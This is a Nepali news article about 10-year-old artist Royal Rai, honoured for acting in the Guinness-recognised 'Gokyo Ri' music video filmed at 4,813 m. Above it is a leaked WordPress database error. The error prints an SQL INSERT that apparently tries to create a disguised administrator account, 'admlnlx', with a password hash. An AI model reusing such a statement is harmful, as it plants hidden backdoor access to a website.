WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByE76T7GCANv9gVwmyhMlQVPkuSNym0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:16:01', '', 'admlnlx', 'admlnlx')

कीर्तिमानी बाल कलाकार रायल राई “साहसी कला सम्मान २०७८” द्वारा सम्मान – Gaule Khabar

कीर्तिमानी बाल कलाकार रायल राई “साहसी कला सम्मान २०७८” द्वारा सम्मान

१० वर्षिय किर्तिमानी बाल कलाकार रायल राई "हिमाल साहसिक कला सम्मान २०७८" द्वारा सम्मानित भएकि छिन।

कीर्तिमानी बाल कलाकार रायल राई “साहसी कला सम्मान २०७८” द्वारा सम्मान

 

१० वर्षिय किर्तिमानी बाल कलाकार रायल राई “हिमाल साहसिक कला सम्मान २०७८” द्वारा सम्मानित भएकि छिन। राईको ब्राण्डको प्रायोजन तथा हिमाल एफ एम ९०.२ मेगाहर्जको आयोजना रहेको एक औपचारिक कार्यक्रम बिच कार्यक्रमका प्रमुख अथिती नेपालका प्रथम सम्माननिय उपराष्ट्रपति श्री परमानन्द झा, रिपोर्टस क्लबका अध्यक्ष ऋषि धमला र हिमाल एफ एम का अध्यक्ष निमा शेर्पाद्वारा बाल कलाकार राई लगायत १७ जनालाई सम्मान गरेका छन।

गत साल सोलुखुम्बु जिल्लाको हिमाली भेग गोक्योमा पहिलो पटक नेपाली कलाकार टोलिले ४८१३ मिटरको उचाईमा ” गोक्यो रि” नामक गित लाईभ बाजा सहित अडियो रेकर्ड तथा भिडियो छायांकन गरि गिनिज बुकमा नाम लेखाएका थिए। गोक्यो रि गितको म्युजिक भिडियोमा १० वर्षिय रायल राई बाल कालाकारको रुपमा देख्न सकिन्छ। उक्त गीतले गिनिज बुक अफ वर्ल्ड रेकर्डको मान्यता पाए संगै सम्मान गरिएको हो। सम्मान कार्यक्रमका बिच गिनिज बुक अफ वर्ल्ड रेकर्ड को प्रमाणपत्र समेत बिशिस्ट अथिती ऋषि धमलाद्वारा हस्तान्तरण गरिएको थियो। सन्च बहादुर राई, पुष्कर नेपाल, राजन खरेल, लक्ष्मण कार्की र पावल राईलाई गिनिज बुक अफ वर्ल्ड रेकर्ड होल्डरको र बाकी अन्य सबैलाई पार्टिसिपेन्ट प्रमाणपत्र प्रदान गरिएको थियो।

राई पहिलो साहसी बाल कलाकार हुन जसले ४८१३ मिटरको उचाईमा पहिलो पटक अन्य कलाकार सहित म्युजिक भिडियोमा अभिनय गर्न सफल भईन। खेल्ने उमेरमा पनि उनको यस्तो साहसिक कार्य देखेर सबै दङ्ग छन। सुरुमा उनले यो काम गर्न सक्छिन भनेर आफ्नै टिमका अन्य सदस्यले समेत विस्वास गरेका थिएनन तर उनले सहज तरिकाले अभिनय गरिन। उनको अभिनय रहेको गोक्यो रि गीतमा गितकार मिलन किरातीको रचना, बहुप्रतिभाशाली कलाकार, गायक, संगीतकार बिक्रम राईको संगीत, चर्चित संगीत संयोजक फनिन्द्र राईको संगीत, चर्चित गायिका बबिना किरातीको आवाज तथा अभिनय र वरिष्ठ साउन्ड ईन्जिनियर छिरिङ भोटेले रेकर्डिङ गर्नु भएको थियो।। लाईभ बाद्यबादकको लागि गिटार राजिब बैजु, अक्टाप्याड बिक्रम गुरुङ, मादल संगीतकार बिक्रम राई र बासुरी पावल राईले बजाएका थिए।

त्यस्तै गोक्यो रि गितको म्युजिक भिडियोको निर्देशन अहिलेका ब्यस्त कलाकार तथा निर्देशक दुर्लभ जन्तरेले गरेका हुन। जन्तरेको निर्देशनमा मोडेल तथा गायिका बबिना किराती, मोडल अनिश सिंजाली मगर रहेका छन भने छायांकन तथा सम्पादन इसाक जबेगु र सहयोगी छायाकारमा दुर्गा प्रशाद राई रहेका छन। उक्त गोक्यो रि गितका निर्माता सन्च बहादुर राई, पुष्कर नेपाल, राजन खरेल, लक्ष्मण कार्की र पावल राई रहेका छन। यो टिम गत वर्ष निर्माता सन्च बहादुर राईको नेतृत्वमा कार्तिक १७ गते त्यस तर्फ प्रस्थान गरेका थिए।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका